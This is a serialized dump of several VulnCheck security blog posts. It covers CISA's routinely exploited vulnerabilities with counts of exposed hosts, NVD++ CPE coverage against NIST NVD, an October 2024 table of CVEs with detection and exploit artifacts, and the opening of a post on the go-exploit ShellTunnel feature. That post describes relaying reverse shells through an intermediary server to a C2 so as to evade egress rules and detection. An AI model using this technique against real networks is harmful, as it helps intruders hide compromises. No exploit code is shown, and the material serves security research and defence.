Log4Shell",[341,62116,62117],{},"2022-12-05",[341,62119,61923],{},[341,62121,59510],{},[341,62123,59510],{},[341,62125,59510],{},[341,62127,59510],{},[341,62129,59510],{},[341,62131,59510],{},[313,62133,62134,62137,62140,62142,62144,62146,62148,62150,62152],{},[341,62135,62136],{},"Ivanti MobileIron Authentication Log4Shell",[341,62138,62139],{},"2022-12-06",[341,62141,61923],{},[341,62143,59510],{},[341,62145,59510],{},[341,62147,59510],{},[341,62149,59510],{},[341,62151,59510],{},[341,62153],{},[61,62155,62157],{"id":62156},"a-look-into-potentially-vulnerable-hosts","A Look into Potentially Vulnerable Hosts",[18,62159,62160],{},"Taking a step further to see the impact of these vulnerabilities, we looked up potentially vulnerable hosts over a 3-day period in VulnCheck IP Intelligence to see the breadth of potential targets available to threat actors. For vulnerabilities VulnCheck has developed detection artifacts for, VulnCheck measures their potential exposure on the open Internet.",[307,62162,62163,62173],{},[310,62164,62165],{},[313,62166,62167,62170],{},[316,62168,62169],{},"Host Type",[316,62171,62172],{},"Potentially Vulnerable Hosts",[336,62174,62175,62183,62189,62197,62205,62211,62219,62227,62235,62243,62251,62258],{},[313,62176,62177,62180],{},[341,62178,62179],{},"Cisco IOS XE",[341,62181,62182],{},"92277",[313,62184,62185,62187],{},[341,62186,62179],{},[341,62188,62182],{},[313,62190,62191,62194],{},[341,62192,62193],{},"Fortinet FortiOS",[341,62195,62196],{},"199570",[313,62198,62199,62202],{},[341,62200,62201],{},"Citrix Netscaler",[341,62203,62204],{},"24377",[313,62206,62207,62209],{},[341,62208,62201],{},[341,62210,62204],{},[313,62212,62213,62216],{},[341,62214,62215],{},"Apache Log4J",[341,62217,62218],{},"65245",[313,62220,62221,62224],{},[341,62222,62223],{},"Zoho Manage Engine",[341,62225,62226],{},"9213",[313,62228,62229,62232],{},[341,62230,62231],{},"OwnCloud 
GraphAPI",[341,62233,62234],{},"18086",[313,62236,62237,62240],{},[341,62238,62239],{},"Progress MOVEit",[341,62241,62242],{},"2461",[313,62244,62245,62248],{},[341,62246,62247],{},"JetBrains TeamCity",[341,62249,62250],{},"2004",[313,62252,62253,62255],{},[341,62254,54034],{},[341,62256,62257],{},"3229",[313,62259,62260,62263],{},[341,62261,62262],{},"Papercut NG\u002FMF",[341,62264,62265],{},"1496",[61,62267,62269],{"id":62268},"our-final-thoughts","Our Final Thoughts",[18,62271,62272],{},"CISA’s 2023 Top Routinely Exploited Vulnerabilities Report highlights vulnerabilities that, based on our research, are highly targeted by threat actors. The report provides valuable insights into technologies frequently used within the federal government and commonly targeted. Organizations should evaluate their exposure to these technologies, enhance visibility into potential risks, leverage robust threat intelligence, maintain strong patch management practices, and implement mitigating controls, such as minimizing internet-facing exposure of these devices wherever 
possible.",[61,62274,202],{"id":201},[18,62276,45062],{},[18,62278,208],{},[18,62280,211,62281,45071],{},[47,62282,216],{"href":214,"rel":62283},[51],{"title":219,"searchDepth":220,"depth":220,"links":62285},[62286,62292,62293,62294,62295,62296],{"id":61483,"depth":220,"text":61484,"children":62287},[62288,62289,62290,62291],{"id":61495,"depth":1266,"text":60799},{"id":61506,"depth":1266,"text":61507},{"id":61513,"depth":1266,"text":61514},{"id":61525,"depth":1266,"text":61526},{"id":61532,"depth":220,"text":45021},{"id":61603,"depth":220,"text":61604},{"id":62156,"depth":220,"text":62157},{"id":62268,"depth":220,"text":62269},{"id":201,"depth":220,"text":202},{"slug":62298},"cisa-top-exploited-2024","\u002Fblog\u002Fcisa-top-exploited-2024",{"title":61411,"description":57889},"blog\u002Fcisa-top-exploited-2024",[23275,1279],"cV5bMymfdPu7fF0GzvNO1vFPPAV254K4p3DVx9uBlhM",{"id":62305,"title":62306,"articles":7,"authors":62307,"body":62309,"date":62469,"description":62317,"extension":234,"image":7,"link":7,"meta":62470,"navigation":237,"path":62472,"seo":62473,"series":7,"stem":62474,"subtype":7,"tags":62475,"__hash__":62476},"blog\u002Fblog\u002Foutpacing-nvd-cpe.md","Outpacing NIST NVD with VulnCheck NVD++",[62308],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":62310,"toc":62457},[62311,62313,62327,62331,62334,62337,62340,62344,62347,62353,62356,62362,62366,62369,62372,62375,62379,62382,62388,62391,62395,62402,62407,62428,62432,62435,62438,62442,62445],[61,62312,20],{"id":3520},[22,62314,62315,62318,62321,62324],{},[25,62316,62317],{},"VulnCheck NVD++ provides CPE for 76.95% of CVEs published in 2024 while NIST NVD only provides CPE for 41.35% of CVEs",[25,62319,62320],{},"On average, VulnCheck NVD++ has CPE four days faster than NVD.",[25,62322,62323],{},"VulnCheck achieves this through extensive automation and monitoring.",[25,62325,62326],{},"VulnCheck NVD++ is available as a free community 
offering.",[61,62328,62330],{"id":62329},"the-critical-role-of-cpe-in-detecting-vulnerabilities","The Critical Role of CPE in Detecting Vulnerabilities",[18,62332,62333],{},"Common Platform Enumeration (CPE) is a standardized naming system for software, systems, and hardware, making it essential for accurate vulnerability management. By enabling security teams to gain visibility and identify exactly which assets are affected when a vulnerability is disclosed, CPE cuts down response times and improves patching precision. Historically, the cybersecurity industry has relied on the National Institute of Standards and Technology (NIST), the stewards of both the National Vulnerability Database (NVD) and the CPE programs, to publish CPE data alongside Common Vulnerabilities and Exposures (CVE) entries.",[18,62335,62336],{},"For years, the security industry has taken the availability of CPE data for granted, relying on it as a foundational part of cybersecurity infrastructure. That changed abruptly in March 2024, when the NVD stopped publishing CPE data. This unexpected halt created significant disruption across the industry. Countless companies, from vulnerability databases to security software vendors, found themselves scrambling to fill the gap left by the sudden absence of this vital, freely available resource. Without access to consistent, reliable and timely CPE data, these companies struggled to provide their customers with the clear, actionable intelligence they depended on.",[18,62338,62339],{},"In response, VulnCheck stepped in to help. In March 2024, we launched NVD++, an enhanced version of the NVD that includes VulnCheck-generated CPE entries. Designed as a drop-in replacement for the NVD, NVD++ allows organizations to resume providing precise, actionable vulnerability information to their customers. 
What’s more, VulnCheck offers NVD++ completely free of charge as part of our commitment to supporting the cybersecurity community with reliable and accessible resources.",[61,62341,62343],{"id":62342},"the-nvd-is-back-but-is-it-really","The NVD is Back, But is it Really?",[18,62345,62346],{},"In late May 2024, NVD secured a new contract and returned to processing CVEs and new CPE data started flowing into NVD once more. Yet even with NVD’s return, there is still a gap in coverage and timeliness that is notable, leaving the need for an alternate source for timely and reliable CPE. So let’s take a look at how VulnCheck NVD++ has become the go-to source for timely, reliable and accurate CPE through our community offering, which has continued to grow, mature, and outpace NIST NVD.",[18,62348,62349],{},[68,62350],{":width":10862,"alt":62351,"src":62352},"VulnCheck NVD CPE Comparison","\u002Fblog\u002Foutpacing-nvd-cpe\u002Fvulncheck-cpe.png",[18,62354,62355],{},"This CPE Generation chart by source maps CPE generation by the number of CVEs based on the publish date of the vulnerability.  Since VulnCheck started generating CPEs in 2024 you can see the CPE generation has outpaced NVD since they paused processing in mid-February. VulnCheck has generated CPE consistently through automation and now covers 76.95% of CVEs while NIST NVD has only generated CPE for 41.35% of CVEs and is reliant on human analysis.\nTo dive deeper into CPE generation over time, we can compare VulnCheck and NIST NVD CPE generation by day throughout 2024. 
This provides visibility into which organization generated CPEs in relation to each CVE’s publication date.",[18,62357,62358],{},[68,62359],{":width":10862,"alt":62360,"src":62361},"Annual CPE Comparison","\u002Fblog\u002Foutpacing-nvd-cpe\u002Fcpe-comparison.png",[61,62363,62365],{"id":62364},"how-quickly-is-vulncheck-cpe-available-for-timely-detection","How Quickly is VulnCheck CPE Available for Timely Detection?",[18,62367,62368],{},"While NIST NVD is reliant on human analysis and publishes CPE entries on its own schedule and resource availability, VulnCheck has focused on automating the creation and validation of CPE, often within hours of a vulnerability disclosure. This accelerated timeline allows organizations to respond sooner with precision, helping them outpace their adversaries.",[18,62370,62371],{},"To put this speed advantage of VulnCheck NVD++ to the test, we conducted a four-week study from October 11 to November 8, 2024, comparing the CPE release times of CVEs between VulnCheck NVD++ and NIST NVD. The results confirmed what our users already know: VulnCheck’s accelerated CPE publication provides a critical edge in vulnerability detection.",[18,62373,62374],{},"Over the course of the study, 3,189 CVEs were published, including several CVEs that were disclosed in vendor advisories but not published to MITRE (cve.org). Of these, NVD++ contained CPE for 2,279 CVEs (71.5%) while NIST NVD contained CPE for 1,470 CVEs (46.1%) during the same time period. This shows that over a four-week period, VulnCheck generated CPE for 809 CVEs that NVD has not generated CPE for (a rate of 28 more CVE covered per day).",[993,62376,62378],{"id":62377},"accelerating-the-time-to-detection-ahead-of-nist-nvd","Accelerating the Time to Detection Ahead of NIST NVD",[18,62380,62381],{},"Our case study also helped us put a number on how much faster NVD++ receives CPE. 
In the 997 instances where NVD++ contained CPE and NIST NVD eventually added CPE too, VulnCheck, on average, generated CPE more than 96 hours faster than NVD.",[18,62383,62384],{},[68,62385],{":width":10862,"alt":62386,"src":62387},"CNA Breakdown","\u002Fblog\u002Foutpacing-nvd-cpe\u002Fcpe-days-faster.png",[18,62389,62390],{},"A four-day time gap provides defenders with a significant advantage in gaining visibility into their vulnerabilities faster. This can even play out on the shorter end of the time scale. For example, CVE-2024-4757, affecting Fortinet FortiManager, was published on October 23, 2024, and added to CISA KEV on the same day. VulnCheck NVD++ had CPE hours after disclosure, but NIST NVD lagged behind by 24 hours - very crucial hours for a vulnerability being actively exploited in the wild.",[61,62392,62394],{"id":62393},"what-we-know-about-the-cves-without-cpe-in-nvd","What We Know About the CVEs without CPE in NVD++",[18,62396,62397,62398,62401],{},"Of the 910 CVEs that currently have no CPE assigned, many of these CVEs involve WordPress plugins, open-source projects on GitHub, or submissions to MITRE, the CNA of last resort. Many of these are new and\u002For esoteric software that has never been assigned CPE, and because VulnCheck ",[1131,62399,62400],{},"only"," uses official CPEs created by NIST (to avoid later untangling conflicting CPE), closing this gap is not entirely possible.",[18,62403,62404],{},[68,62405],{":width":10862,"alt":62386,"src":62406},"\u002Fblog\u002Foutpacing-nvd-cpe\u002Fcpe-cna-breakdown.png",[18,62408,62409,62410,62415,62416,62421,62422,62427],{},"Another significant source of CVEs missing CPEs comes from CNAs that release advisories with incomplete or poorly formatted information and neglect to submit the CVE to MITRE. These account for approximately 30% of the CVEs without CPEs in our NVD++ study. Although it sounds unbelievable, our data supports this finding. 
Here are three examples:  ZDI published an advisory for ",[47,62411,62414],{"href":62412,"rel":62413,"target":10881},"https:\u002F\u002Fwww.zerodayinitiative.com\u002Fadvisories\u002FZDI-24-1383\u002F",[51],"CVE-2024-9710"," on October 15 with no corresponding entry on cve.org; Bosch did the same for ",[47,62417,62420],{"href":62418,"rel":62419,"target":10881},"https:\u002F\u002Fpsirt.bosch.com\u002Fsecurity-advisories\u002Fbosch-sa-162032-bt.html",[51],"CVE-2024-33618"," on October 16; and IBM for ",[47,62423,62426],{"href":62424,"rel":62425,"target":10881},"https:\u002F\u002Fwww.ibm.com\u002Fsupport\u002Fpages\u002Fsecurity-bulletin-ibm-qradar-siem-contains-multiple-vulnerabilities-26",[51],"CVE-2024-28786"," on October 17. This pattern repeats daily, averaging around 10 CVEs per day.",[993,62429,62431],{"id":62430},"nvd-faster-cpe-through-automation","NVD++: Faster CPE Through Automation",[18,62433,62434],{},"VulnCheck is able to achieve a faster CPE generation time because our commercial offering, Exploit and Vulnerability Intelligence (EVI), monitors almost 500 unique CVE data sources. EVI normalizes the data sources and makes them available over an API or via bulk download, which gives us a huge lake of data from which to build and normalize CPE data. As VulnCheck continues to invest in EVI, NVD++ will continue improving due to the increased volume of data.",[18,62436,62437],{},"Our commercial customers also greatly benefit from the fast CPE generation times because they have access to our CPE API, which allows them to look up CPEs and receive all the known vulnerabilities without ever even having to integrate with a data source like NVD++ or NIST NVD. 
Additionally, since we generate everything automatically, our commercially available CPE Dictionary contains new versions significantly faster than the NIST CPE dictionary.",[61,62439,62441],{"id":62440},"accessing-vulncheck-and-nvd-cpe-from-a-single-reliable-source-w-vulncheck-nvd","Accessing VulnCheck and NVD CPE from a Single Reliable Source w\u002F VulnCheck NVD++",[18,62443,62444],{},"VulnCheck NVD++ provides seamless access to both VulnCheck CPE and NIST CPE from a single source. This free community offering delivers the full NIST NVD dataset, enriched with VulnCheck CPE, via high-speed API and bulk download. You can download a complete copy of the data in seconds.",[18,62446,62447,62448,62452,62453,59],{},"To receive CPE faster to better support your customers, go to ",[47,62449,62450],{"href":62450,"rel":62451},"https:\u002F\u002Fwww.vulncheck.com",[51]," and click the “Sign in \u002F Join” button on the top right. You’ll automatically be given access to all of our VulnCheck community offerings, including 
",[47,62454,62456],{"href":40670,"rel":62455},[51],"NVD++",{"title":219,"searchDepth":220,"depth":220,"links":62458},[62459,62460,62461,62462,62465,62468],{"id":3520,"depth":220,"text":20},{"id":62329,"depth":220,"text":62330},{"id":62342,"depth":220,"text":62343},{"id":62364,"depth":220,"text":62365,"children":62463},[62464],{"id":62377,"depth":1266,"text":62378},{"id":62393,"depth":220,"text":62394,"children":62466},[62467],{"id":62430,"depth":1266,"text":62431},{"id":62440,"depth":220,"text":62441},"2024-11-14",{"slug":62471},"outpacing-nvd-cpe","\u002Fblog\u002Foutpacing-nvd-cpe",{"title":62306,"description":62317},"blog\u002Foutpacing-nvd-cpe",[33173],"DCG8qVVPyfZeV7cBCsendQEURU_j64ApYqw7MpzPQmw",{"id":62478,"title":62479,"articles":7,"authors":62480,"body":62482,"date":63085,"description":63086,"extension":234,"image":7,"link":7,"meta":63087,"navigation":237,"path":63089,"seo":63090,"series":7,"stem":63091,"subtype":7,"tags":63092,"__hash__":63093},"blog\u002Fblog\u002Finitial-access-intelligence-october-2024.md","Detecting Exploitation w\u002F VulnCheck Initial Access Intelligence - October 2024",[62481],{"name":10,"avatar":11,"link":12,"linkName":13},{"type":15,"value":62483,"toc":63076},[62484,62486,62492,62495,62499,62508,62512,62520,62523,62527,62530,62534,62537,62555,62559,63054,63056,63064,63069,63071],[18,62485,59412],{},[18,62487,62488],{},[68,62489],{":width":10862,"alt":62490,"src":62491},"Initial Access Intelligence - October 2024","\u002Fblog\u002Finitial-access-intelligence-october-2024\u002FInitial-Access-October-2024.png",[18,62493,62494],{},"In October 2024, VulnCheck crossed 300+ CVEs that have Initial Access Intelligence (IAI) artifacts, developing artifacts for 21 CVEs, covering 16 different vendors and products. 
11 of the 22 have confirmed exploitation activity as of November 10th, 2024.",[61,62496,62498],{"id":62497},"expanded-coverage-of-the-flax-typhoon-botnet","Expanded Coverage of the Flax Typhoon Botnet",[18,62500,62501,62502,62507],{},"We've continued to expand detection coverage for CVEs which were discovered to be a target of the recently reported ",[47,62503,62506],{"href":62504,"rel":62505},"http:\u002F\u002Fvulncheck.com\u002Fblog\u002Fflax-typhoon-botnet",[51],"Flax Typhoon Botnet",". This month additional CVEs we've added coverage for include: CVE-2023-26469 (Jorani - LMS), CVE-2023-47218 (QNAP - QTS, QuTS_hero, QuTScloud), CVE-2023-37582 (Apache - RocketMQ), CVE-2019-12168 (Four-Faith - F3x24, F3x36), and CVE-2021-46422 (Telesquare - SDT-CW3B1). VulnCheck now boasts detection coverage for 37 of the 66 CVEs associated with the Flax Typhoon Botnet.",[61,62509,62511],{"id":62510},"detection-artifacts-for-abb-cyclon-aspect-industrial-control-systems","Detection Artifacts for ABB Cylon ASPECT Industrial Control Systems",[18,62513,62514,62515,62519],{},"During October, we released initial access artifacts for ABB Cylon ASPECT CVE-2023-0636 & CVE-2024-6209, including a ",[47,62516,62518],{"href":58306,"rel":62517},[51],"blog post"," and video walkthrough from Jacob Baines exploring the ABB systems exploits and internet-connected systems to see what’s accessible and potentially vulnerable.",[59905,62521],{"allow":59907,"allow-full-screen":10874,"frame-border":445,"height":59908,"referrer-policy":59909,"src":62522,"title":59911,"width":10862},"https:\u002F\u002Fwww.youtube.com\u002Fembed\u002FmVJnjB1gGrw?si=WNoZkGcsWuGS7rka",[61,62524,62526],{"id":62525},"expanded-visibility-w-fofa-zoomeye-queries","Expanded Visibility w\u002F FOFA & ZoomEye Queries",[18,62528,62529],{},"In October we expanded VulnCheck’s Initial Access query coverage. 
In addition to providing Shodan, Censys and GreyNoise queries, we have expanded query coverage to now include FOFA & ZoomEye furthering our commitment to helping defenders gain broad visibility into their attack surface.",[61,62531,62533],{"id":62532},"initial-access-intelligence-october-breakdown","Initial Access Intelligence - October Breakdown",[18,62535,62536],{},"To provide better visibility into these updates, we’ve broken down October’s Initial Access Intelligence Artifacts by CVE. For each CVE, we provide a range of detection tools including:",[22,62538,62539,62541,62543,62545,62547,62549,62551,62553],{},[25,62540,325],{},[25,62542,59440],{},[25,62544,59443],{},[25,62546,59446],{},[25,62548,59449],{},[25,62550,59452],{},[25,62552,59455],{},[25,62554,59458],{},[61,62556,62558],{"id":62557},"october-2024-initial-access-artifacts","October 2024 Initial Access Artifacts",[307,62560,62561,62583],{},[310,62562,62563],{},[313,62564,62565,62567,62569,62571,62573,62575,62577,62579,62581],{},[316,62566,61637],{},[316,62568,59474],{},[316,62570,242],{},[316,62572,22852],{},[316,62574,61646],{},[316,62576,59485],{},[316,62578,61651],{},[316,62580,61654],{},[316,62582,61657],{},[336,62584,62585,62608,62630,62652,62675,62698,62720,62741,62763,62786,62808,62831,62852,62874,62896,62919,62942,62964,62987,63009,63032],{},[313,62586,62587,62590,62593,62596,62598,62600,62602,62604,62606],{},[341,62588,62589],{},"Jorani Log Poisoning RCE",[341,62591,62592],{},"2024-10-02",[341,62594,62595],{},"CVE-2023-26469",[341,62597,59510],{},[341,62599,59510],{},[341,62601,59510],{},[341,62603,59510],{},[341,62605,59510],{},[341,62607,59510],{},[313,62609,62610,62613,62615,62618,62620,62622,62624,62626,62628],{},[341,62611,62612],{},"Linear eMerge e3-Series forgot_password Command 
Injection",[341,62614,62592],{},[341,62616,62617],{},"CVE-2024-9441",[341,62619,59510],{},[341,62621],{},[341,62623,59510],{},[341,62625,59510],{},[341,62627,59510],{},[341,62629],{},[313,62631,62632,62635,62638,62640,62642,62644,62646,62648,62650],{},[341,62633,62634],{},"QNAP QTS and QuTS hero Unauthenticated Remote Code Execution in quick.cgi",[341,62636,62637],{},"2024-10-03",[341,62639,30248],{},[341,62641,59510],{},[341,62643,59510],{},[341,62645,59510],{},[341,62647,59510],{},[341,62649,59510],{},[341,62651],{},[313,62653,62654,62657,62660,62663,62665,62667,62669,62671,62673],{},[341,62655,62656],{},"Apache RocketMQ Arbitrary File Write",[341,62658,62659],{},"2024-10-04",[341,62661,62662],{},"CVE-2023-37582",[341,62664,59510],{},[341,62666,59510],{},[341,62668,59510],{},[341,62670,59510],{},[341,62672,59510],{},[341,62674],{},[313,62676,62677,62680,62683,62686,62688,62690,62692,62694,62696],{},[341,62678,62679],{},"Hash Form WordPress Plugin Nonce Exposure RCE",[341,62681,62682],{},"2024-10-07",[341,62684,62685],{},"CVE-2024-5084",[341,62687,59510],{},[341,62689,59510],{},[341,62691,59510],{},[341,62693,59510],{},[341,62695,59510],{},[341,62697,59510],{},[313,62699,62700,62703,62706,62708,62710,62712,62714,62716,62718],{},[341,62701,62702],{},"Four-Faith Hidden Creds and OS command execution",[341,62704,62705],{},"2024-10-09",[341,62707,58495],{},[341,62709,59510],{},[341,62711,59510],{},[341,62713,59510],{},[341,62715,59510],{},[341,62717,59510],{},[341,62719],{},[313,62721,62722,62725,62727,62729,62731,62733,62735,62737,62739],{},[341,62723,62724],{},"Four-Faith Auth Bypass via Hidden API",[341,62726,62705],{},[341,62728,24221],{},[341,62730,59510],{},[341,62732,59510],{},[341,62734,59510],{},[341,62736,59510],{},[341,62738,59510],{},[341,62740],{},[313,62742,62743,62746,62748,62751,62753,62755,62757,62759,62761],{},[341,62744,62745],{},"Four-Faith Hidden Creds and Information 
Leak",[341,62747,62705],{},[341,62749,62750],{},"CVE-2024-9643",[341,62752,59510],{},[341,62754,59510],{},[341,62756,59510],{},[341,62758,59510],{},[341,62760,59510],{},[341,62762],{},[313,62764,62765,62768,62771,62774,62776,62778,62780,62782,62784],{},[341,62766,62767],{},"Telesquare SDT-CW3B1 sysCommand RCE",[341,62769,62770],{},"2024-10-16",[341,62772,62773],{},"CVE-2021-46422",[341,62775],{},[341,62777],{},[341,62779,59510],{},[341,62781,59510],{},[341,62783,59510],{},[341,62785],{},[313,62787,62788,62791,62793,62796,62798,62800,62802,62804,62806],{},[341,62789,62790],{},"ABB ASPECT System Credential Disclosure",[341,62792,62770],{},[341,62794,62795],{},"CVE-2024-6209",[341,62797,59510],{},[341,62799,59510],{},[341,62801,59510],{},[341,62803,59510],{},[341,62805,59510],{},[341,62807],{},[313,62809,62810,62813,62816,62819,62821,62823,62825,62827,62829],{},[341,62811,62812],{},"Glibc iconv Buffer Overflow",[341,62814,62815],{},"2024-10-17",[341,62817,62818],{},"CVE-2024-2961",[341,62820,59510],{},[341,62822],{},[341,62824],{},[341,62826],{},[341,62828],{},[341,62830],{},[313,62832,62833,62836,62838,62840,62842,62844,62846,62848,62850],{},[341,62834,62835],{},"Magento XXE Glibc iconv Buffer Overflow RCE",[341,62837,62815],{},[341,62839,62818],{},[341,62841,59510],{},[341,62843,59510],{},[341,62845,59510],{},[341,62847,59510],{},[341,62849,59510],{},[341,62851],{},[313,62853,62854,62857,62859,62862,62864,62866,62868,62870,62872],{},[341,62855,62856],{},"ViciDial Blind SQL Credential Leak",[341,62858,62815],{},[341,62860,62861],{},"CVE-2024-8503",[341,62863,59510],{},[341,62865,59510],{},[341,62867,59510],{},[341,62869,59510],{},[341,62871,59510],{},[341,62873],{},[313,62875,62876,62879,62881,62884,62886,62888,62890,62892,62894],{},[341,62877,62878],{},"ABB ASPECT System networkDiagAjax Command 
Injection",[341,62880,62815],{},[341,62882,62883],{},"CVE-2023-0636",[341,62885,59510],{},[341,62887,59510],{},[341,62889,59510],{},[341,62891,59510],{},[341,62893,59510],{},[341,62895],{},[313,62897,62898,62901,62904,62907,62909,62911,62913,62915,62917],{},[341,62899,62900],{},"SerComm CPE Router Authenticated Command Injection",[341,62902,62903],{},"2024-10-20",[341,62905,62906],{},"CVE-2021-44080",[341,62908],{},[341,62910],{},[341,62912],{},[341,62914],{},[341,62916],{},[341,62918],{},[313,62920,62921,62924,62927,62930,62932,62934,62936,62938,62940],{},[341,62922,62923],{},"LiteSpeed Cache Weak RNG RCE",[341,62925,62926],{},"2024-10-22",[341,62928,62929],{},"CVE-2024-28000",[341,62931,59510],{},[341,62933,59510],{},[341,62935,59510],{},[341,62937,59510],{},[341,62939,59510],{},[341,62941],{},[313,62943,62944,62947,62949,62952,62954,62956,62958,62960,62962],{},[341,62945,62946],{},"LiteSpeed Cache Credential Leak",[341,62948,62926],{},[341,62950,62951],{},"CVE-2024-44000",[341,62953,59510],{},[341,62955],{},[341,62957,59510],{},[341,62959,59510],{},[341,62961,59510],{},[341,62963,59510],{},[313,62965,62966,62969,62972,62975,62977,62979,62981,62983,62985],{},[341,62967,62968],{},"Palo Alto Network Expedition Authentication Bypass",[341,62970,62971],{},"2024-10-25",[341,62973,62974],{},"CVE-2024-5910",[341,62976],{},[341,62978],{},[341,62980],{},[341,62982,59510],{},[341,62984,59510],{},[341,62986],{},[313,62988,62989,62992,62994,62997,62999,63001,63003,63005,63007],{},[341,62990,62991],{},"Palo Alto Network Expedition Authentication Bypass & Command Injection",[341,62993,62971],{},[341,62995,62996],{},"CVE-2024-9464",[341,62998,59510],{},[341,63000],{},[341,63002,59510],{},[341,63004,59510],{},[341,63006,59510],{},[341,63008],{},[313,63010,63011,63014,63017,63020,63022,63024,63026,63028,63030],{},[341,63012,63013],{},"Fortinet FortiManager Missing Authentication 
Vulnerability",[341,63015,63016],{},"2024-10-28",[341,63018,63019],{},"CVE-2024-47575",[341,63021],{},[341,63023],{},[341,63025],{},[341,63027],{},[341,63029],{},[341,63031],{},[313,63033,63034,63037,63039,63042,63044,63046,63048,63050,63052],{},[341,63035,63036],{},"Halo Spring WebFlux Path Traversal",[341,63038,63016],{},[341,63040,63041],{},"CVE-2024-38816",[341,63043,59510],{},[341,63045,59510],{},[341,63047,59510],{},[341,63049,59510],{},[341,63051,59510],{},[341,63053],{},[61,63055,59830],{"id":59829},[18,63057,59833,63058,59838,63061],{},[47,63059,59837],{"href":58240,"rel":63060},[51],[47,63062,58240],{"href":58240,"rel":63063},[51],[18,63065,59844,63066,59],{},[47,63067,20558],{"href":14297,"rel":63068},[51],[61,63070,59851],{"id":59850},[18,63072,59854,63073],{},[47,63074,59857],{"href":59857,"rel":63075},[51],{"title":219,"searchDepth":220,"depth":220,"links":63077},[63078,63079,63080,63081,63082,63083,63084],{"id":62497,"depth":220,"text":62498},{"id":62510,"depth":220,"text":62511},{"id":62525,"depth":220,"text":62526},{"id":62532,"depth":220,"text":62533},{"id":62557,"depth":220,"text":62558},{"id":59829,"depth":220,"text":59830},{"id":59850,"depth":220,"text":59851},"2024-11-12","In October 2024, VulnCheck developed new Initial Access Intelligence (IAI) artifacts for 21 CVEs, covering 16 different vendors and products.",{"slug":63088},"initial-access-intelligence-october-2024","\u002Fblog\u002Finitial-access-intelligence-october-2024",{"title":62479,"description":63086},"blog\u002Finitial-access-intelligence-october-2024",[1281],"0eyD94t3wQU2OddMdEXai1qyVvDDitzhm8NRovBnIYU",{"id":63095,"title":63096,"articles":63097,"authors":63103,"body":63105,"date":63300,"description":63301,"extension":234,"image":7,"link":7,"meta":63302,"navigation":237,"path":63304,"seo":63305,"series":7,"stem":63306,"subtype":7,"tags":7,"__hash__":63307},"blog\u002Fblog\u002Fgo-exploit-shelltunnel.md","Introducing a New Command-and-Control Feature in go-exploit: The 
ShellTunnel",[63098],{"title":63099,"source":63100,"link":63101,"date":63102},"We’re Not Saying “I told you so” – PSW #850","SC Media Paul's Security Weekly Podcast","https:\u002F\u002Fwww.scworld.com\u002Fpodcast-segment\u002F13217-were-not-saying-i-told-you-so-psw-850","2024-11-06",[63104],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":63106,"toc":63289},[63107,63109,63123,63127,63130,63134,63145,63151,63154,63158,63161,63180,63183,63187,63190,63194,63200,63203,63223,63226,63230,63233,63253,63257,63260,63263,63266,63268],[61,63108,20],{"id":3520},[22,63110,63111,63114,63117,63120],{},[25,63112,63113],{},"go-exploit, VulnCheck’s open-source exploit framework, now includes a new C2 feature called ShellTunnel.",[25,63115,63116],{},"ShellTunnel captures reverse shell traffic and routes it through an intermediary attacker-controlled server before reaching the main command-and-control (C2) server.",[25,63118,63119],{},"This setup ensures that the victim device never directly connects to the C2, which can be beneficial in bypassing network egress restrictions.",[25,63121,63122],{},"ShellTunnel is fully compatible with older exploits and requires minimal modification to implement.",[61,63124,63126],{"id":63125},"video-walkthrough-go-exploit-shelltunnel-with-confluence-cve-2023-22527","Video Walkthrough: go-exploit ShellTunnel with Confluence CVE-2023-22527",[59905,63128],{"allow":59907,"allow-full-screen":10874,"frame-border":445,"height":59908,"referrer-policy":59909,"src":63129,"title":59911,"width":10862},"https:\u002F\u002Fwww.youtube.com\u002Fembed\u002FDciMcu7aFw8?si=E2pSL4isoWP5pOcE",[61,63131,63133],{"id":63132},"overview-of-go-exploit-and-the-shelltunnel-feature","Overview of go-exploit and the ShellTunnel Feature",[18,63135,63136,63139,63140,63144],{},[47,63137,20558],{"href":14297,"rel":63138},[51]," is a Go-based exploit framework built and maintained by ",[47,63141,63143],{"href":45535,"rel":63142},[51],"VulnCheck’s Initial 
Access Intelligence"," team. The design uniquely supports a range of flexible C2 configurations. The latest feature to hit go-exploit is ShellTunnel, a new C2 that adds flexibility and operational security by capturing and forwarding reverse shell traffic from an intermediary server before sending it on to the primary C2 server.",[18,63146,63147],{},[68,63148],{":width":10862,"alt":63149,"src":63150},"ShellTunnel C2","\u002Fblog\u002Fgo-exploit-shelltunnel\u002Fsupported-c2.png",[18,63152,63153],{},"What makes ShellTunnel especially appealing is its simplicity and ease of integration. The C2 effectively acts as a proxy shell, allowing teams to redirect traffic through a middle server instead of a direct connection. This is valuable for a variety of operational reasons, including network egress rules that can limit direct connections to external servers.",[61,63155,63157],{"id":63156},"how-shelltunnel-works-in-go-exploit","How ShellTunnel Works in go-exploit",[18,63159,63160],{},"The ShellTunnel setup is straightforward yet powerful. Here’s how it operates:",[1789,63162,63163,63168,63174],{},[25,63164,63165,63167],{},[295,63166,60148],{}," The attacker initiates an attack from an intermediary system using go-exploit. A good example would be an attacker that has compromised a firewall, and is attempting to pivot inwards. 
The intermediary is the firewall.",[25,63169,63170,63173],{},[295,63171,63172],{},"Reverse Shell Capture:"," The compromised system sends the reverse shell back to the attacker's server (intermediary server or firewall in the above example), where go-exploit is running.",[25,63175,63176,63179],{},[295,63177,63178],{},"Data Forwarding to C2:"," go-exploit’s ShellTunnel then forwards this reverse shell traffic to the main C2 server, creating a separation between the compromised device and the C2.",[18,63181,63182],{},"This separation means that the target device only connects to the attacker’s intermediary server, never to the main C2, which may help avoid detection and reduce certain types of network logging.",[61,63184,63186],{"id":63185},"implementing-shelltunnel-in-real-world-scenarios","Implementing ShellTunnel in Real-World Scenarios",[18,63188,63189],{},"To showcase ShellTunnel, we used an example based on our previously open sourced go-exploit for CVE-2023-22527, affecting Confluence servers (see our previous writeup, Does Confluence Dream of Shells?). We updated the exploit to incorporate the new ShellTunnel feature. 
